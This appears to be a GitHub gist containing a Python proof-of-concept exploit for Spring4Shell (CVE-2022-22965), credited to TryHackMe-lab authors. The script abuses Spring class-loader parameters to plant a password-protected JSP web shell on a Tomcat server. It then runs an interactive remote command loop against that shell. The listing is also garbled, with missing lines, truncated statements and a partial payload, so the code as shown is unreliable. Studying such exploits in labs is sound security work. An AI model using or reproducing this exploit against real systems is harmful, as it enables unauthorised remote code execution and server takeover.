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Last active April 7, 2022 09:18
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Try Hack Me's modified Spring4Shell (CVE-2022-22965) Proof of Concept (PoC) by Captain NIck Lucifer* (*pronounced Lu-cipher) @naryal2580 @c4p-n1ck <> <>
#!/usr/bin/env python3
# Spring4Shell Exploit
# Original Exploit:
# Modified by: AG | MuirlandOracle
# AGAIN Modified with fanciness by: Captain Nick Lucifer* (*pronounced Lucifer) @naryal2580 @c4p-n1ck
import urllib.parse, \
requests, readline, \
argparse, re
from string import printable
from random import (
); from stoyled import *;
verbose = True
def gen_random_name(len=13, chars=''):
random_name = ''
if not chars:
chars = printable.split('!')[0]
for _ in range(len):
random_name += choice(chars)
return random_name
def exploit(url, filename, password, directory, verbose=True):
if not filename:
filename = gen_random_name(randint(8, 18))
headers = {"suffix":"%><!--//",
data = f"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22{password}%22.equals(request.getParameter(%22pwd%22)))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&{directory}&class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
shellurl = urllib.parse.urljoin(url, f"{filename}.jsp")
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
if shellgo.status_code == 200:
if verbose:
print(good(f"Shell Uploaded Successfully! at -> {shellurl}?pwd={password}"))
print(good(f"Shell Uploaded Successfully! at -> {shellurl}"))
if verbose:
print(bad("Exploit failed to upload"))
except Exception as e:
if verbose:
print(bad(f'Exception -> {e}'))
def shell(url, filename='', pwd='thm', cmd='id', show=True):
resp = requests.get(urllib.parse.urljoin(url, filename), params={'pwd': pwd, 'cmd': cmd})
stdout = re.sub("(<!--.*|- if\(\".*)", "", resp.content.decode(), flags=re.DOTALL).strip()
if show:
print(stdout, end='', flush=True)
return stdout
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Spring4Shell RCE Proof of Concept')
parser.add_argument('-u', '--url', help='Target URL')
parser.add_argument("-f","--filename", help="Name of the file to upload (Default <somerandomfilename>.jsp)", default='')
parser.add_argument("-p","--password", help="Password to protect the shell with (Default: thm)", default="thm")
parser.add_argument("-d","--directory", help="The upload path for the file (Default: ROOT)", default="ROOT")
parser.add_argument("-s","--surl", help="URL to the uploaded tomcatwar jsp (Default: null)", default='')
args = parser.parse_args()
if args.surl:
url = args.surl
while 1:
username, hostname, pwd = shell(url, cmd='whoami', show=0).replace('\n', ''), urllib.parse.urlparse(url).netloc, shell(url, cmd='pwd', show=0).replace('\n', '')
print(f'{bold}{green_l}{username}@{hostname}{rst}{bold}:{blue_l}{pwd}{rst}{bold}#{rst}', end='', flush=True)
cmd = input(' ')
if cmd in ('quit', 'exit'):
shell(url, cmd=cmd)
except KeyboardInterrupt:
except Exception as e:
if verbose:
print(bad(f'Error -> {e}'))
exploit(args.url, args.filename.split(".")[0], args.password,
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